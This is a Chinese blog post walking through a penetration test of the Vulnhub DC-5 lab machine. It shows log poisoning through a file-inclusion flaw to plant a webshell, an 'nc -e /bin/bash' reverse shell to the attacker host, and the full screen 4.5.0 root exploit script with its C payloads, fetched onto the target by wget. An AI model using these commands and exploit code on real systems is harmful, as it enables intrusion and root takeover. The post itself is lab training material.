【CyberSecurityLearning 74】DC系列之DC-5渗透测试

最新推荐文章于 2023-02-28 23:49:42 发布
最新推荐文章于 2023-02-28 23:49:42 发布
阅读量775 收藏
点赞数 1
分类专栏: CyberSecurityLearning 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Waffle666/article/details/116268913
版权

目录

DC系列之DC-5渗透测试 

实验环境:

实验步骤:

1、主机扫描,确定目标主机IP

2、对DC-5进行端口扫描

3、访问DC-5的web服务,了解相关信息

4、使用wfuzz测试页面参数

5、看看根目录下有哪些文件,我们尝试暴力破解

6、测试是否为动态包含,使用BurpSuite 爆破变量名

7、远程文件包含写入木马(失败)

8、本地文件包含

8、反弹shell ,建立长久性的连接(NC反弹,-e可用)

9、考虑提权

 

DC系列之DC-5渗透测试 

实验环境:

  • 目标机DC-5的MAC地址:00:0C:29:CE:ED:B8(IP测试出来为192.168.3.175)(重启了一遍又变成了192.168.3.180,醉了!)
  • 攻击机kali的IP地址:192.168.3.249

实验步骤:

1、主机扫描,确定目标主机IP

命令:nmap -sP 192.168.3.1/24 -oN nmap.sP(扫描得知DC-5的IP为192.168.3.175)

2、对DC-5进行端口扫描

命令:nmap -A 192.168.3.175 -p- -oN nmap.A

3、访问DC-5的web服务,了解相关信息

点击Contact,尝试提交一些数据,测试是否存在XSS漏洞

提交后跳转到如下界面:

我们再提交一次:

4、使用wfuzz测试页面参数

具体使用可以参考:WFUZZ的使用

5、看看根目录下有哪些文件,我们尝试暴力破解

使用工具burpsuite / 御剑 /  dirb(dirb默认字典只是目录字典,不能爆破文件,dirb是可以自定义字典的)

打开burpsuite扫描,发现了有footer.php最特殊

一刷新就会变化

 

我们发现192.168.3.175/thankyou.php和/footer.php,刷新一下版权都会变化

我们猜测这两个文件是包含关系(thankyou.php文件引入了footer.php)PHP中从一个文件去调用另外一个文件的过程叫文件包含

 

6、测试是否为动态包含,使用BurpSuite 爆破变量名

192.168.3.175/thankyou.php?fuzz=footer.php

导入文件名的字典,得到其变量名是file

重启DC-5后,IP变成了1992.168.3.180,下面就用192.168.3.180演示

包含一下/etc/passwd

如果我们去包含一个文件的时候,如果包含的是一句话木马的话,就可以直接用菜刀连接了。
我们如何把一句话木马弄到服务器上?
远程文件包含

7、远程文件包含写入木马(失败)

通过http协议的方式,叫远程文件包含

远程文件包含的前提:要开启allow_url_fopen和allow_url_include

测试后发现我们包含文件的时候只能包含本地文件

8、本地文件包含

我们想本地文件中有一句话木马。我们怎样把一句话木马写到本地文件里面
我们所有的用户操作,对于一个web应用来讲都有日志,我们如果把提交的内容写到它的日志里面,通过文件包含去包含这个日志就可以执行日志文件中的一句话木马

目标中的日志文件在哪里?
通过测试我们知道目标服务器属于nginx,我们做一个爆破(使用通用的http的日志目录字典,字典要强大)

找到系统日志文件路径

/var/log/nginx/access.log

把一句话木马写到日志文件中去

尝试用蚁剑连接

连接成功!

我们考虑把一句话木马放到/tmp目录下

为什么要换成/tmp/404.html呢,因为日志一直读写,对我们操作会有影响

再用蚁剑连接,得到一个稳定的shell

8、反弹shell ,建立长久性的连接(NC反弹,-e可用)

在反弹之前,我们kali先本地监听一下,nc -lvvp 1234

-e 参数可用

[nc -e /bin/bash 192.168.3.249 1234]

反弹成功!

进入交互式状态!

python -c 'import pty;pty.spawn("/bin/bash")'

9、考虑提权

思路1、sudo -l(查看有没有一些命令在执行期间有root权限标签没有密码保护——Not found)

思路2、查看有没有一些具有suid权限的命令

find / -perm /4000 2>dev/null

发现screen 4.5.0 存在一个本地特权提升的漏洞

有个sh文件

把这个文件拷贝:cp /usr/share/exploitdb/exploits/linux/local/41154.sh ./41154.sh

cat一下这个脚本

把这个脚本上传到服务器尝试运行

我们本地开启一个80

python -m SimpleHTTPServer 80

通过浏览器去访问一下

192.168.3.249/41154.sh

来到蚁剑——》来到/tmp目录下,,单击右键有个WGET下载

我们也可以通过命令行的方式,

我们分析一下41154.sh

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...

打开41154.sh 脚本文件,尝试本地编译其内的两个c语言程序,将该脚本拆分成3部分,具体内容如下

 

查看脚本

vim libhax.c把文件内容粘贴进去

----libhax.c

#include <stdio.h>
 
#include <sys/types.h>
 
#include <unistd.h>
 
__attribute__ ((__constructor__))
 
void dropshell(void){
 
    chown("/tmp/rootshell", 0, 0);
 
    chmod("/tmp/rootshell", 04755);
 
    unlink("/etc/ld.so.preload");
 
    printf("[+] done!\n");
 
}

编译,生成libhax.so 文件

gcc -fPIC -shared -ldl -o ./libhax.so ./libhax.c

-------rootshell.c

#include <stdio.h>
 
int main(void){
 
    setuid(0);
 
    setgid(0);
 
    seteuid(0);
 
    setegid(0);
 
    execvp("/bin/sh", NULL, NULL);
 
}

编译,生成rootshell 文件

gcc -o ./rootshell ./rootshell.c

vim run.sh

---run.sh

#!/bin/bash
 
# screenroot.sh
 
# setuid screen v4.5.0 local root exploit
 
# abuses ld.so.preload overwriting to get root.
 
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
 
# HACK THE PLANET
 
# ~ infodox (25/1/2017)
 
echo "[+] Now we create our /etc/ld.so.preload file..."
 
cd /etc
 
umask 000 # because
 
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
 
echo "[+] Triggering..."
 
screen -ls # screen itself is setuid, so...
 
/tmp/rootshell

本地开启http服务

    python -m SimpleHTTPServer

 

靶机/tmp 目录下远程下载

    wget http://192.168.3.249/rootshell

    wget http://192.168.3.249/libhax.so

    wget http://192.168.3.249/run.sh

运行run.sh 文件,进行提权

Wαff1ε
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-5靶机详细渗透过程
MRS_jianai的博客
12-21 468
DC-5靶机详细渗透过程
[目标检测]End-to-End Object Detection with Transformers文献解读(2020)
qq_42575422的博客
12-05 2812
1、 为什么要做这个研究(理论走向和目前缺陷) ? 以前做目标检测主流是faster rcnn之流要做anchor和NMS等手工设计。 2、 他们怎么做这个研究 (方法,尤其是与之前不同之处) ? 将目标检测问题视为集合预测问题,所预测的集合中的每个元素即每个GT集合中的元素一一对应,且每个元素输出的是相对整个图像的位置、尺寸,避免了NMS和anchor设计。 具体做法就是CNN主干网络对输入图片提取特征,然后将每个特征的位置信息加上一并输入到Transformer中,输出固定个数的预测结果,每个预测结果不
kali渗透之DC-5
余笙.'的博客
12-05 967
kali渗透DC- 5靶机
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5893
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
Vulnhub | DC5靶机 渗透测试
菜鸡一枚
02-28 205
Vulnhub-DC系列第五个靶机,burp爆破登录框、本地文件包含漏洞(LFI)、nginx错误日志写一句话木马、screen-4.5.0提权
看完这篇 教你玩转渗透测试靶机vulnhub——DC5
Aluxian_的博客
03-25 6134
Vulnhub靶机DC5渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:文件包含: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC5,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址: https://download.vulnhub.co
渗透测试学习之靶机DC-5
xdbzdgx的博客
11-18 5243
1.下载靶机 本篇文章是DC靶机系列的第五篇,针对的是靶机DC-5,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-5的下载地址为DC: 5 ~ VulnHub。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 同样地,DC-5只有一个flag。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到roo.
dc-5 靶机渗透学习
..
03-20 1866
信息收集 扫描存活主机 nmap -sP 192.168.202.0/24 对靶机开放的端口服务进行扫描 nmap -A -p- -v 192.168.202.143 漏洞利用 访问80端口 ,用Wappalyzer识别框架,发现只是个简单的页面 查看一下源代码,发现有五个php文件,分别对应五个标题 来到Contact查看了一下,发现有几个地方可以填写信息,抓取发送的数据包查看了一下,没什么特别。 发送数据后会跳转到thankyou.php,并且...
DC-5靶机渗透
m0_62008601的博客
05-21 612
攻击机kali:192.168.56.102(桥接网络) 靶机dc-5:192.168.56.106 (仅主机网络) 两台主机的ip设置在同一网段之后开始扫描存活主机: 扫描端口: nmap -sV -p- 192.168.56.106 80端口开放,用浏览器进行访问 并没有发现什么信息 wappalyzer插件中可以看到web服务器为nginx,接着在页面摸索一番,发现contact下可以提交表单 随便输入信息提交之后我们发现跳转到了另外一个页面且发现底部的年份发生了..
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC-4-Web渗透测试靶机
最新发布
01-19
DC-4
CyberSecurityLearning 附】渗透测试技术选择题 + 法律法规
热门推荐
_Co1a
04-16 1万+
1、RDP的端口号为() A. 3389 B. 23 C. 22 D. 443 2、Burp Suite 是用于攻击()的集成平台。 A. web 应用程序 B. 客户机 C. 服务器 D. 浏览器 3、使用nmap进行ping扫描时使用的参数() A. -sP B. -p C. -p0 D. -A 4、nmap的-sV是什么操作() A. TCP全连接扫描 B. FIN扫描 C. 版本扫描 D. 全面扫描 5、在HTTP 状态码中表示重定向的是() A. 200 B. 302 C. 403 D.
CyberSecurityLearning 21】防火墙
_Co1a
02-23 2780
目录 防火墙 防火墙的基本概念 防火墙的基本功能 防火墙产品及厂家 区域隔离 防火墙的分类 防火墙的发展历史 ▪包过滤防火墙 ▪应用网关/应用代理防火墙 ▪状态检测防火墙 (主流) ▪DPI防火墙(Deep Packet Inspection) 衡量防火墙性能的5大指标 防火墙的典型应用 1、标准应用 ——透明模式 2、标准应用 ——路由模式 /NAT模式 3、标准应用 ——混杂模式 4、高级应用—双机热备 防火墙策略分析-最安全的防火墙架构 实验 防火墙 防火墙的
CyberSecurityLearning 69】反序列化漏洞
_Co1a
04-17 2710
目录 反序列化 为什么要序列化 PHP 中序列化与反序列化 *简单的例子 *序列化Demo *漏洞何在? @ 创建一个类,一个对象并将其序列化和反序列化 @ 反序列化注入 *为什么会这样呢 反序列化 为什么要序列化 百度百科关于序列化的定义是,将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 简单地说,序列化就是把一个对象变成可以传输的字符串,可以以特定.
【内网安全】域横向内网漫游Socks代理隧道技术
_Co1a
09-21 2640
代理技术和隧道技术都属于内网穿透,代理主要解决内网里面通信的问题(比如对方在内网,你也在内网,这时候两个内网实现通信就必须要经过代理才能实现,常见工具有frp、ngrok和ew等,ew(earthworm已经停止更新了,就不演示)),和一些防火墙的拦截 隧道主要是一些安全设备和流量监控设备上的拦截问题 代理主要解决的是三种问题:内网主机有外网,内网有过滤有一些防火墙问题、内网里面无外网 必要基础知识点: 1.内外网简单知识 内网ip地址是私有ip地址(10/8, 172.16/1...
网络安全学习目录
_Co1a
03-15 2430
网络安全学习目录 第一阶段(1~28) 【CyberSecurityLearning 1】虚拟化架构与windows XP、windows server 2003、windows 2008、windows 7部署 【CyberSecurityLearning 2】IP地址与DOS命令 【CyberSecurityLearning 3】批处理、用户与组管理、服务器远程管理、破解Windows系统密码 【CyberSecurityLearning 4】NTFS安全权限及文件共享服务器 【Cybe
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值